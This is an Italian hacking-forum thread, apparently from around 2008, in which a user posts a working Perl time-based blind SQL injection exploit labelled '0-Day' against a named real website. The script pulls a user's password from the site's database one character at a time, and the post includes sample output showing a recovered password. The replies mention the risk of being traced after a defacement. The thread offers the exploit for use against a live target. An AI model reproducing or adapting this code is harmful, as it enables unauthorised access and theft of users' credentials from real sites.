[s3rg3770] gdr.leonardo.it Remote Blind SQL Injection Exploit

Stato
Discussione chiusa ad ulteriori risposte.

imported_D4nt3

Utente Silver
6 Gennaio 2008
0
0
0
57
Codice:
#!/usr/bin/perl
#gdr.leonardo.it Remote Blind SQL Injection Exploit By Dante90 & s3rg3770
#Authors: Dante90, WaRWolFz Crew & s3rg3770

use strict;
use LWP::UserAgent;

use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

my ($Hash,$Time,$Time_Start,$Time_End,$Response);
my($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122);
my $Host = "http://gdr.leonardo.it/sondaggi/"; #Insert Victime Web Site Link
my $id  = shift or &usage;
my $Method = HTTP::Request->new(GET => $Host);
my $HTTP = new LWP::UserAgent;
my $Referrer = "http://warwolfz.altervista.org/";
my $DefaultTime = request($Referrer);

sub Blind_SQL_Jnjection{
	my ($dec,$hex) = @_;
	return "./tutte.asp?ID=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `utenti` WHERE `idutente`=${id})/*";
}

for(my $I=1; $I<=40; $I++){
	for(my $J=0; $J<=62; $J++){
		$Time_Start = time();
		$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
		$Time_End = time();
		$Time = request($Referrer);
		refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
		if($Time_End - $Time_Start > 6){
			$Time = request($Referrer);
			refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
			if($Time_End - $Time_Start > 6){
				syswrite(STDOUT,chr($chars[$J]));
				$Hash .= chr($chars[$J]);
				$Time = request($Referrer);
				refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
				last;
			}
		}
	}
	if($I == 1 && length $Hash < 0 && !$Hash){
		print " * Exploit Failed                                      *\n";
		print " ------------------------------------------------------ \n";
		exit;
	}
	if($I == 40){
		print " * Exploit Successed                                   *\n";
		print " ------------------------------------------------------\n ";
		system("pause");
	}
}

sub usage{
	system("cls");
	{
		print " \n gdr.leonardo.it Remote Blind SQL Injection Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [idutente]                    *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	exit;
}

sub request{
	$Referrer = $_[0];
	$Method->referrer($Referrer);
	$Start = Time::HiRes::time();
	$Response = $HTTP->request($Method);
	$Response->is_success() or die "$Host : ", $Response->message,"\n";
	$End = Time::HiRes::time();
	$Time = $End - $Start;
	return $Time;
}

sub refresh{
	system("cls");
	{
		print " \n gdr.leonardo.it Remote Blind SQL Injection Exploit\n";
		print " ------------------------------------------------------ \n";
		print " * USAGE:                                             *\n";
		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
		print " * perl name_exploit.pl [idutente]                    *\n";
		print " ------------------------------------------------------ \n";
		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
		print " ------------------------------------------------------ \n";
	};
	print " * Victime Site: " . $_[0] . "\n";
	print " * Default Time: " . $_[1] . " seconds\n";
	print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
	print " * BruteForcing N Char Hash: " . $_[5] . "\n";
	print " * SQL Time: " . $_[4] . " seconds\n";
	print " * Hash: " . $_[3] . "\n";
}

#WaRWolFz Crew
Codice:
 [0-Day] gdr.leonardo.it Remote Blind SQL Injection Exploit
 ------------------------------------------------------
 * USAGE:                                             *
 * cd [Local Disk]:\[Directory Of Exploit]\           *
 * perl name_exploit.pl [idutente]                    *
 ------------------------------------------------------
 *         Powered By Dante90, WaRWolFz Crew          *
 * www.warwolfz.org - dante90_founder[at]warwolfz.org *
 ------------------------------------------------------
 * Victime Site: http://gdr.leonardo.it/sondaggi/
 * Default Time: 0.702222108840942 seconds
 * BruteForcing Hash: u
 * BruteForcing N Char Hash: 15
 * SQL Time: 0.665714025497437 seconds
 * Hash: v1nc3r3
Terminating on signal SIGINT(2)

Dante
 
Codice:
my $Host = "http://gdr.leonardo.it/sondaggi/"; #Insert Victime Web Site Link

non conviene fornire l'impostazione come argomento?


Codice:
my $Referrer = "http://warwolfz.altervista.org/";

questo non può darvi problemi? (Dal punto di vista "giudiziario")
 
Il $Referrer nn dà problemi, ho lanciato l'exploit e cm vedi funziona.. Per quanto riguarda l'$Host, personalmente nn mi trovo bene a farlo passare da linea di comando, così lo definisco nel source :D Dante
 
Ehm, non diceva "problemi" nel senso che non fa andare lo script. "Problemi" nel senso che vedono il referer e vanno sul vostro sito (e quindi sanno chi ha commesso l'eventuale deface)
 
Aaah nono, nn funziona così.. Io Prendo il tempo SQL di Default dal mio sito :D tra l'altro nn funziona più, ora è warwolfz.com .__. Dante
 
D4nt3 ha detto:
Per quanto riguarda l'$Host, personalmente nn mi trovo bene a farlo passare da linea di comando, così lo definisco nel source :D Dante

Puoi sempre tenere in considerazione entrambe le possibilità facendo un paio di controlli, ma è una considerazione di poca importanza, capisco che in lavori di questo genere la buona programmazione passa in secondo piano rispetto al funzionamento e all'utilità
 
C'è poco da capire, evidentemente non conosci bene perl, questa variabile incrementandola annulla il buffer.
Un *po'* come la funzione free() del C definita in stdlib che svuota il buffer dopo un allocanzione/collocazione di memoria.
 
trottarello ha detto:
dante scusa maaaaa....sto sito dove dove sta...XD...

warwolfz.com? ShellRent è una merd*.. Vi consiglio di nn avere MAI nulla a che fare cn loro.. Per uno stupido attacco D-DoS, il server è giù da 6 giorni. Sn degli incompetenti.. E sai cosa mi hanno detto? "Passa ad altervista". Ma scusa una cosa.. Ho pagato 36 fottuti €, per farmi sentire dire "vai da altervista"? Adesso ho comprato un altro dominio, perché sto perdendo utenti, gira voce che warwolfz sia morta, su msn rotture di palle sempre cn le stesse domande a me e al mio staff.. Aspetto che si sistemi tutto va'. Oggi ho recuperato tutti i BackUp. Dante

evilmight ha detto:
C'è poco da capire, evidentemente non conosci bene perl, questa variabile incrementandola annulla il buffer.

Cm flush(); ob_flush(); in php? Dante

EDIT
6 giorni scusate, nn 6 mesi
 
Stato
Discussione chiusa ad ulteriori risposte.